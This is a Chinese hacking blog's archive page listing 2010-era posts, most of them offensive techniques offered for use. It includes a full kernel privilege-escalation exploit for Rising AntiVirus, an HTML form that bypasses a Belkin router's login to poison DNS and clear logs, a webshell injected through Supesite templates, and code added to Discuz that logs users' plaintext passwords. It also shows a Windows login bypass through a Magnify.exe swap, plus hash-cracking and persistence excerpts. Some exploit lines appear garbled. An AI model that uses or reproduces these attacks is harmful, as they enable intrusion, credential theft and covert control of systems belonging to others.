存档

‘技术文章’ 分类的存档

国内网络安全风险评估市场与技术操作

2010年2月1日 1 条评论 216 views

近两年网络安全风险评估渐渐为人们所重视,不少大型企业尤其是运营商、金 融业都请了专业公司进行评估。本文提出作者个人对国内安全风险评估操作的一些评价,并试图阐述作者所理解的,可裁剪、易操作的风险评估方式。由于内容与商 业公司有关,因此不可避免会涉及部份商业利益,在文中作者尽量隐去可能产生直接利害关系的文字,并声明所有评价纯属个人观点,如果你有不同意见,欢迎来函 探讨。

1. 什么是风险评估

说起风险评估,大家脑海中首先浮现的可能是:风险、资产、影响、威胁、弱点等一连串的术语,这些术语看起来并不难理解,但一旦综合考虑就会象绕口令般组 合。比如风险,用ISO/IEC TR 13335-1:1996中的定义可以解释为: 特定威胁利用某个(些)资产的弱点,造成资产损失或破坏的潜在可能性。

为了帮助理解,我们举一个下里巴人的例子:我口袋里有100块钱,因为打瞌睡,被小偷偷走了,搞得晚上没饭吃。

用风险评估的观点来描述这个案例,我们可以对这些概念作如下理解:

风险 = 钱被偷走
资产 = 100块钱
影响 = 晚上没饭吃
威胁 = 小偷
弱点 = 打瞌睡

回到阳春白雪来,假设这么个案例:某证券公司的数据库服务器因为存在RPC DCOM的漏洞,遭到入侵者攻击,被迫中断3天。

让我们尝试做一道小学时常做的连线题,把左右两边相对应的内容用线段连接起来:

风险		RPC DCOM漏洞
资产		服务器遭到入侵
影响		数据库服务器
威胁		入侵者
弱点		中断三天

如果这道题对你没什么难度,那么恭喜你,你已经和国内大多数风险评估的操作者差不多站在同一个起跑线上了。

阅读全文...

分类: 技术文章 标签:

瑞星本地提权通杀利用代码

2010年1月31日 没有评论 258 views

编译后,运行此程序,可在ring3下直接恢复其ssdt,然后就可以为所欲为了,刚才测试1月28日对瑞星2010版有效,据说也适用于2009和 2008版本

//MY Blog:http://hi.baidu.com/9908006

//MY QQ:165659238

//VC-ConsoleWithApi

#include "stdafx.h"

#include "windows.h"

enum { SystemModuleInformation = 11 };

typedef struct {

ULONG Unknown1;

ULONG Unknown2;

PVOID Base;

ULONG Size;

ULONG Flags;

USHORT Index;

USHORT NameLength;

USHORT LoadCount;

USHORT PathLength;

CHAR ImageName[256];

} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct {

ULONG Count;

SYSTEM_MODULE_INFORMATION_ENTRY Module[1];

} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

HANDLE g_RsGdiHandle = 0 ;

void __stdcall WriteKVM(PVOID Address , ULONG Value)

{

ULONG ColorValue = Value ;

ULONG btr ;

ULONG ColorBuffer = 0 ;

DeviceIoControl(g_RsGdiHandle ,

0x83003C0B,

&ColorValue ,

sizeof(ULONG),

&ColorBuffer ,

sizeof(ULONG),

&btr ,

0

);

DeviceIoControl(g_RsGdiHandle ,

0x83003C0B,

&ColorValue ,

sizeof(ULONG),

Address ,

sizeof(ULONG),

&btr ,

0

);

return ;

}

void AddCallGate()

{

ULONG Gdt_Addr;

ULONG CallGateData[0x4];

ULONG Icount;

__asm

{

push edx

sgdt [esp-2]

pop edx

mov Gdt_Addr , edx

}

__asm

{

push 0xc3

push Gdt_Addr

call WriteKVM

mov eax,Gdt_Addr

mov word ptr[CallGateData],ax

shr eax,16

mov word ptr[CallGateData+6],ax

mov dword ptr[CallGateData+2],0x0ec0003e8

mov dword ptr[CallGateData+8],0x0000ffff

mov dword ptr[CallGateData+12],0x00cf9a00

xor eax,eax

LoopWrite:

mov edi,dword ptr CallGateData[eax]

push edi

mov edi,Gdt_Addr

add edi,0x3e0

add edi,eax

push edi

mov Icount,eax

call WriteKVM

mov eax,Icount

add eax , 0x4

cmp eax,0x10

jnz LoopWrite

}

return ;

}

void IntoR0(PVOID function)

{

WORD Callgt[3];

Callgt[0] = 0;

Callgt[1] = 0;

Callgt[2] = 0x3e3;

__asm

{

call fword ptr[Callgt]

mov eax,esp

mov esp,[esp+4]

push eax

call function

pop esp

push offset ring3Ret

retf

ring3Ret:

nop

}

return ;

}

#pragma pack(1)

typedef struct _IDTR

{

SHORT IDTLimit;

UINT IDTBase;

}IDTR,

*PIDTR,

**PPIDTR;

#pragma pack()

ULONG g_RealSSDT = 0 ;

ULONG ServiceNum = 0 ;

ULONG OrgService [0x1000] ;

ULONG RvaToOffset(IMAGE_NT_HEADERS *NT, ULONG Rva)

{

ULONG Offset = Rva, Limit;

IMAGE_SECTION_HEADER *Img;

WORD i;

Img = IMAGE_FIRST_SECTION(NT);

if (Rva < Img->PointerToRawData)

return Rva;

for (i = 0; i < NT->FileHeader.NumberOfSections; i++)

{

if (Img.SizeOfRawData)

Limit = Img.SizeOfRawData;

else

Limit = Img.Misc.VirtualSize;

if (Rva >= Img.VirtualAddress &&

Rva < (Img.VirtualAddress + Limit))

{

if (Img.PointerToRawData != 0)

{

Offset -= Img.VirtualAddress;

Offset += Img.PointerToRawData;

}

return Offset;

}

}

return 0;

}

#define ibaseDD *(PDWORD)&ibase

DWORD GetHeaders(PCHAR ibase, PIMAGE_FILE_HEADER *pfh, PIMAGE_OPTIONAL_HEADER *poh, PIMAGE_SECTION_HEADER *psh)

{

PIMAGE_DOS_HEADER mzhead=(PIMAGE_DOS_HEADER)ibase;

if ((mzhead->e_magic!=IMAGE_DOS_SIGNATURE)||(ibaseDD[mzhead->e_lfanew]!=IMAGE_NT_SIGNATURE)) return FALSE;

*pfh=(PIMAGE_FILE_HEADER)&ibase[mzhead->e_lfanew];

if (((PIMAGE_NT_HEADERS)*pfh)->Signature!=IMAGE_NT_SIGNATURE) return FALSE;

*pfh=(PIMAGE_FILE_HEADER)((PBYTE)*pfh+sizeof(IMAGE_NT_SIGNATURE));

*poh=(PIMAGE_OPTIONAL_HEADER)((PBYTE)*pfh+sizeof(IMAGE_FILE_HEADER));

if ((*poh)->Magic!=IMAGE_NT_OPTIONAL_HDR32_MAGIC) return FALSE;

*psh=(PIMAGE_SECTION_HEADER)((PBYTE)*poh+sizeof(IMAGE_OPTIONAL_HEADER));

return TRUE;

}

typedef struct {

WORD offset:12;

WORD type:4;

} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;

#define RVATOVA(base,offset) ((PVOID)((DWORD)(base)+(DWORD)(offset)))

DWORD FindKiServiceTable(HMODULE hModule,DWORD dwKSDT , PULONG ImageBase)

{

PIMAGE_FILE_HEADER pfh;

PIMAGE_OPTIONAL_HEADER poh;

PIMAGE_SECTION_HEADER psh;

PIMAGE_BASE_RELOCATION pbr;

PIMAGE_FIXUP_ENTRY pfe;

DWORD dwFixups=0,i,dwPointerRva,dwPointsToRva,dwKiServiceTable;

BOOL bFirstChunk;

GetHeaders((PCHAR)hModule,&pfh,&poh,&psh);

if ((poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) &&

(!((pfh->Characteristics)&IMAGE_FILE_RELOCS_STRIPPED))) {

pbr=(PIMAGE_BASE_RELOCATION)RVATOVA(poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress,hModule);

bFirstChunk=TRUE;

while (bFirstChunk || pbr->VirtualAddress) {

bFirstChunk=FALSE;

pfe=(PIMAGE_FIXUP_ENTRY)((DWORD)pbr+sizeof(IMAGE_BASE_RELOCATION));

for (i=0;i<(pbr->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))>>1;i++,pfe++) {

if (pfe->type==IMAGE_REL_BASED_HIGHLOW) {

dwFixups++;

dwPointerRva=pbr->VirtualAddress+pfe->offset;

dwPointsToRva=*(PDWORD)((DWORD)hModule+dwPointerRva)-(DWORD)poh->ImageBase;

if (dwPointsToRva==dwKSDT)

{

if (*(PWORD)((DWORD)hModule+dwPointerRva-2)==0x05c7)

{

dwKiServiceTable=*(PDWORD)((DWORD)hModule+dwPointerRva+4)-poh->ImageBase;

*ImageBase = poh->ImageBase;

return dwKiServiceTable;

}

}

}

}

*(PDWORD)&pbr+=pbr->SizeOfBlock;

}

}

return 0;

}

DWORD CR0Reg ;

ULONG realssdt ;

void InKerneProc()

{

__asm

{

cli

mov eax, cr0

mov CR0Reg,eax

and eax,0xFFFEFFFF

mov cr0, eax

}

int i;

for (i = 0; i < (int)ServiceNum; i++)

{

*(ULONG*)(*(ULONG*)realssdt + i * sizeof(ULONG)) = OrgService;

}

__asm

{

mov eax, CR0Reg

mov cr0, eax

sti

}

}

int main(int argc, char* argv[])

{

printf("Rising AntiVirus 2008 ~ 2010 n"

"Local Privilege Escalation Vulnerability Proof Of Concept Exploitn 2010-1-27n");

g_RsGdiHandle = CreateFile("[url=]\\.\RSNTGDI[/url]" ,

0,

FILE_SHARE_READ | FILE_SHARE_WRITE ,

0,

OPEN_EXISTING , 0 , 0 );

if (g_RsGdiHandle == INVALID_HANDLE_VALUE)

{

return 0 ;

}

SYSTEM_MODULE_INFORMATION ModuleInfo ;

// Learn the loaded kernel (e.g. NTKRNLPA vs NTOSKRNL), and it's base address

HMODULE hlib = GetModuleHandle("ntdll.dll");

PVOID pNtQuerySystemInformation = GetProcAddress(hlib , "NtQuerySystemInformation");

ULONG infosize = sizeof(ModuleInfo);

__asm

{

push 0

push infosize

lea eax , ModuleInfo

push eax

push 11

call pNtQuerySystemInformation

}

HMODULE KernelHandle ;

LPCSTR ntosname = (LPCSTR)((ULONG)ModuleInfo.Module[0].ImageName + ModuleInfo.Module[0].PathLength);

// Load the kernel image specified

KernelHandle = LoadLibrary(ntosname);

if (KernelHandle == 0 )

{

return 0 ;

}

ULONG KeSSDT = (ULONG)GetProcAddress(KernelHandle , "KeServiceDescriptorTable");

if (KeSSDT == 0 )

{

return 0 ;

}

ULONG ImageBase = 0 ;

ULONG KiSSDT = FindKiServiceTable(KernelHandle , KeSSDT - (ULONG)KernelHandle , &ImageBase);

if (KiSSDT == 0 )

{

return 0 ;

}

KiSSDT += (ULONG)KernelHandle;

ServiceNum = 0x11c ;

ULONG i ;

for (i = 0 ; i < ServiceNum ; i ++)

{

OrgService = *(ULONG*)(KiSSDT + i * sizeof(ULONG)) + (ULONG)ModuleInfo.Module[0].Base - ImageBase;

}

realssdt = KeSSDT - (ULONG)KernelHandle + (ULONG)ModuleInfo.Module[0].Base;

SetThreadAffinityMask(GetCurrentThread () , 0 ) ;

AddCallGate();

IntoR0(InKerneProc);

return 0;

}

分类: 技术文章 标签: , ,

ASP.NET+Win2003虚拟主机安全设置

2010年1月27日 没有评论 103 views

我们举例详细说明在运行ASP.NET的 windows 2003虚拟主机上,对于多个ASP.NET站点的安全配置;
在这里,我们的站点目录放在D盘的www文件夹,假设现在有一个名叫fesend的虚拟主机用户,我们在www文件夹下建立 fesend 的文件夹来存放此用户的站点数据

其中要用到以下组及帐号:
IIS_WPG 组(也称为 IIS 工作进程组,IIS Worker Process Group)
Guests组 (来宾组,在系统中拥有最少的权限)

Internet 来宾帐户 (匿名访问 Internet 信息服务的内置帐户)
启动 IIS 进程帐户 (用于启动进程外应用程序的 Internet 信息服务的内置帐户)
阅读全文...

分类: 技术文章 标签: , ,

贝尔金无线路由器漏洞

2010年1月22日 没有评论 141 views

<html>

<head>

</head>

<body>

<b>这个HTML代码可以绕过webinterface密码保护的贝尔金无线路由器+ADSL2调制解调器<br>

它的工作模式F5D7632-4V6与升级固件6.01.08</b>

<br>

<form action="http://192.168.2.1/cgi-bin/setup_dns.exe" name=dnspoison method=post>

改变DNS域名服务器(IP可以不一样)<br>

<input name=page type=hidden value="setup_dns">

<input name=logout type=hidden value="">

<input name=auto_from_isp type=hidden value="0">

<input name=dns1_1 type=text value="1">

<input name=dns1_2 type=text value="2">

<input name=dns1_3 type=text value="3">

<input name=dns1_4 type=text value="4">

<br>

<input name=dns2_1 type=text value="1">

<input name=dns2_2 type=text value="2">

<input name=dns2_3 type=text value="3">

<input name=dns2_4 type=text value="5">

<br>

<input name=submit type=submit value="放毒">

</form>

<br>

<br>

<form action="http://192.168.2.1/cgi-bin/statusprocess.exe" name=clearlog method=post>

清除日志文件<br>

<input name=securityclear type=submit value="清除">

</form>

<br>

<br>

<form ACTION="http://192.168.2.1/cgi-bin/system_all.exe" method=post name=changepassword>

改变时间、密码(如果您有旧的密码)、远程管理、UPnP<br>

和自动固件更新(美好的结合DNS中毒)<br>

<input type="hidden" name="restart_time" value="0">

<input type="hidden" name="reload" value="1">

<input type="hidden" name="restart_page" value='document.location.href="system.stm";'>

<input type="hidden" name="location_page" value="system.stm">

<input type="hidden" name="server1" value="">

<input type="hidden" name="server2" value="">

<!-- for clock -->

<input type="hidden" name="year" value="">

<input type="hidden" name="mon" value="">

<input type="hidden" name="day" value="">

<input type="hidden" name="hour" value="">

<input type="hidden" name="min" value="">

<input type="hidden" name="sec" value="">

<br>旧密码<br>

<input type="password" size="12" maxlength="12" name="userOldPswd" value="">

<br>新密码,两次<br>

<input type="password" size="12" maxlength="12" name="userNewPswd" value="">

<input type="password" size="12" maxlength="12" name="userConPswd" value="">

<br>登录超时(1-99分钟)<br>

<input type="text" name="timeout" size="3" maxlength="3" value="10">

<br> 时间和时区:<br>

夏令: <br>

<input type="checkbox" name="daylight" value="1">时区(号码)<br>

<input type="text" name="time_zone" value="26">

<input type="checkbox" name="enable_ntp" value="1">启用自动时间服务器维护<br>

<tr>

<td width="240">主服务器</td>

<td width="360">

<select name="time1">

<option>132.163.4.102 - North America</option>

<option>192.5.41.41 - North America</option>

<option>192.5.41.209 - North America</option>

<option>207.200.81.113 - North America</option>

<option>208.184.49.9 - North America</option>

<option>129.132.2.21 - Europe</option>

<option>130.149.17.8 - Europe</option>

<option>128.250.36.3 - Australia</option>

<option>137.189.8.174 - Asia Pacific</option>

</select>

</td>

</tr>

<tr>

<td width="240">副服务器</td>

<td width="360">

<select name="time2">

<option>132.163.4.102 - North America</option>

<option>192.5.41.41 - North America</option>

<option>192.5.41.209 - North America</option>

<option>207.200.81.113 - North America</option>

<option>208.184.49.9 - North America</option>

<option>129.132.2.21 - Europe</option>

<option>130.149.17.8 - Europe</option>

<option>128.250.36.3 - Australia</option>

<option>137.189.8.174 - Asia Pacific</option>

</select>

</td>

</tr>

<br>远程管理:<br>

<input type="checkbox" name="allow_all" value="1">任何IP地址都可以远程管理路由器<br>

只有这个IP地址可以远程管理路由器<br>

<input name="IP1" size="3" maxlength="3" value="0">.

<input name="IP2" size="3" maxlength="3" value="0">.

<input name="IP3" size="3" maxlength="3" value="0">.

<input name="IP4" size="3" maxlength="3" value="0">

<br> 远程端口:

<input name="REMOTEPORT" size="5" maxlength="5" value="0">

<br>NAT 授权:<br>

<input type=radio name=Nat_enable value=1>授权<br>

<input type=radio name=Nat_enable value=0>废除<br>

<br>UPnP<br>

<input type="radio" name="upnp_enable" value=1>授权<br>

<input type=radio name=upnp_enable value=0>废除<br>

<br>自动更新固件<br>

<input type="radio" name="autoUpdate_enable" value=1>授权<br>

<input type="radio" name="autoUpdate_enable" value=0>废除<br>

</form>

<form method="POST" action="http://192.168.2.1/cgi-bin/restore.exe" name="RebootForm">

<br>恢复出厂默认值(包括密码)<br>

<input type="hidden" name="page" value="tools_restore">

<input type="hidden" name="logout">

<input type="submit" value="恢复默认值" style="{width:120px;}" class="submitBtn">

</form>

</body>

</html>

分类: 技术文章 标签:

绕过 Windows Server 2008的密码保护

2010年1月22日 没有评论 114 views

Windows Server 2008是微软Windows服务器产品中最新的操作系统版本。它是基于Windows NT 6.0 SP1的内核。
Microsoft详细信息:http://www.microsoft.com/china/windowsserver2008/

虽然与早期版本相比非常安全,但它可以很容易地绕过密码保护进入主机。
在本文中,我将展示一个简单而有效的方法绕过Windows Server 2008的密码保护。


概念演示:
为了能够绕过密码保护,我们首先需要添加PING CD盘(http://ping.windowsdream.com/ping/Releases/3.00.01/PING-3.00.iso)或其他支持 NTFS-3G驱动的Linux Live光盘(NTFS-3G是一个跨平台执行的Windows NTFS文件系统,支持读/写能力)。

我们首先检查哪个分区是Windows NTFS分区,在这个例子中是/dev/sd1。
fdisk –l | grep NTFS

然后,我们创建目录,将安装Windows文件:
mkdir –p /mnt/windows

因此,我们将Windows分区中的NTFS-3G驱动挂载到/mnt/Windows目录中:
mount –t ntfs-3g /dev/sda1/mnt/windows

现在,我们将一个可执行文件cmd.exe替换为Magnify.exe文件:
mv Magnify.exe Magnify.bck
cp cmd.exe Magnify.exe

阅读全文...

分类: 技术文章 标签:

手工屏蔽迅雷技巧【禁止上传、广告、迅雷看看15秒广告】

2010年1月19日 没有评论 321 views

现在越来越多的人在迅雷上看电影了。我也很喜欢,但是我很不喜欢迅雷看看上的15秒广告。当然,也有迅雷工具的广告也很麻烦。于是,我就在网络上搜罗了一翻,找到了一些迅雷屏蔽的技巧。
[修改时,请先将迅雷程序关闭!]

1. 去除迅雷看看15秒广告

在 C:WINDOWSsystem32driversetc 目录下,用记事本打开 hosts 文件。

复制内容到剪贴板 程序代码
找到
127.0.0.1 localhost
在之后加入
------ 屏蔽迅雷看看广告 ------
0.0.0.0 pubstat.sandai.net
0.0.0.0 mcfg.sandai.net
0.0.0.0 biz5.sandai.net
0.0.0.0 float.sandai.net
0.0.0.0 recommend.xunlei.com
0.0.0.0 cl.kankan.xunlei.com

2. 禁止迅雷偷偷上传
阅读全文...

分类: 技术文章 标签: ,

BT4 final到移动硬盘上了

2010年1月14日 没有评论 2,750 views

1、下载HP_USB_FW.rar,This tool can setup a booting USB flash disk。他可以创建dos的引导程序到U盘里面。下载后解压,执行HPUSBFW.EXE,选FAT32文件系统,快速格式化,要选中创建dos启动 盘,路径指向解压目录下的HPUSBFW目录,这个目录下有引导程序COMMAND.COM、IO.SYS、MSDOS.SYS,这3个文件在格式化完成 后被copy到移动硬盘跟目录下。

HP USB FW

阅读全文...

分类: 技术文章 标签:

Supesite7后台拿shell

2010年1月14日 没有评论 155 views

编辑模板的时候写入这几行,拆开写一句话,就行了:

1. <!--{eval $content = "@eval($_POST[c])";}-->

2. <!--{eval $test1 = "<"."?"."php ".$content."?>";}-->

3. <!--{eval fputs(fopen(S_ROOT.'./templates/default/model_cache.php','w+'),$test1);}-->

分类: 技术文章 标签:

Discuz7 记录明文

2010年1月9日 没有评论 185 views

内容如下:

$ip=$_SERVER['REMOTE_ADDR'];
$showtime=date("Y-m-d H:i:s");
$record="".$username." --------".$password." IP:".$ip." Time:".$showtime."\r\n";
$handle=fopen('./ipdata/csshacklog.php','a+');
$write=fwrite($handle,$record);

修改uc_client目录下的client.php 在

阅读全文...

分类: 技术文章 标签:

域内网中的信息收集之一内网结构的探测

2010年1月6日 没有评论 441 views

作者:lcx

这期的专栏是我设定的题目,看够了注入,是不是想了解一下内网的入侵手法呢?做为出题人,自然要写一篇了。在各式各样大小不同的内网中,最常见的就 是域内 网了。其实域内网的入侵和我们平常的入侵手法在总体上来讲的逻辑也是一样,也是信息的收集、分析,找出薄弱点,然后击破,再综合归纳整理,最终拿到域管理 员的密码,算是大功告成。有了内网的第一台机器的权限后,如何收集信息,这是很关键的一步,这篇文章讲的就是域内网信息的收集的第一步。

1图1(点击查看大图)

阅读全文...

分类: 技术文章 标签: ,

RainbowCrack + LM Tables 破解SAM密码

2010年1月4日 没有评论 209 views

PS:最近下了个彩虹表,研究一下。学习学习这篇文章。

来源:T00LS

如何导出系统的HASH值?
方法A:
pwdump7 工具.
下载地址:http://www.live-share.com/files/358151/Pwdump7.rar.html
方法B:自己想办法把对方的sam文件下载回来.默认目录:C:WINDOWSsystem32configsam

讲解如何通过pwdump7导出HASH并进行破解.!
命令行 pdwump7 >dump.txt 运行后得到一个dump7.txt的文本文件.
d26df636eb216a2a0b55a9ff.GIF (8.93 KB)
阅读全文...

分类: 技术文章 标签: ,

Windows系统密码破解全攻略

2010年1月4日 没有评论 395 views

题目:Windows系统密码破解全攻略
作者:hackest [H.S.T.]
来源:hackest's blog


引子

我一直在想,到底用什么样的方式才能较长时间地控制已经得到了权限的目标呢?留后门,种木马,甚至是Rootkit?留的 Webshell痕迹太明显,哪怕是一句话的Webshell,都极容易被管理员清除。放了木马,也容易被有经验的管理员查出来,毕竟现在能做到无声无色 的木马还是比较少。早期的是自己建个进程,结束掉进程就over了,后来有了注入进程的木马,再后来还有了以服务启动的木马,还有些是替换某些不要紧的系 统自有服务来启动的……不过上述方法隐蔽性都太差了,不管你的后门留得如何完美,不管你的木马程序多么免杀,终究还是做不到不留任何痕迹。

是 不是就没有办法了呢?非也,某前辈(凋凌玫瑰)的一句名言惊醒了N多彷徨的菜鸟(如我之流):我一般不喜欢在服务器留木马或是后门,我比较喜欢利用管理员 进入的方式来管理服务器(凋凌玫瑰文章原话引用)。管理员的进入方式,怎么理解呢?换句话说就是,管理员是怎么进他服务器的,我们就怎么进他的服务器。如 果他是3389终端进入的,我们就终端进入,当然前提是要想办法得到他的管理员用户的密码;如果他是Pcanywhere进入的,我们就想办法获取他的 Pcanywhere密码进入;如果他是Radmin进入服务器的,我们也要想办法搞到他的Ramin密码进入。这样的话,隐蔽性就大大提高了,肉鸡自然 就没有这么容易跑掉了。如果他这个密码是域管理员密码,如果他这个密码可以管理整个机房的机器,如果他这个密码可以通杀他的内网,如果这个密码还能登录他 的QQ!夸张点说,甚至他重装系统了,还用的是这个密码,那你的肉鸡又复活了……后果真是太可怕了(擦下汗先)!废话少说,直入正题——Windows系 统密码破解全攻略。本文所指均为无物理接触的系统密码破解,如果让黑客物理接触计算机,根本就没有什么系统进不去的,而且操作更加简单,速度更快,呵呵。
阅读全文...

分类: 技术文章 标签: ,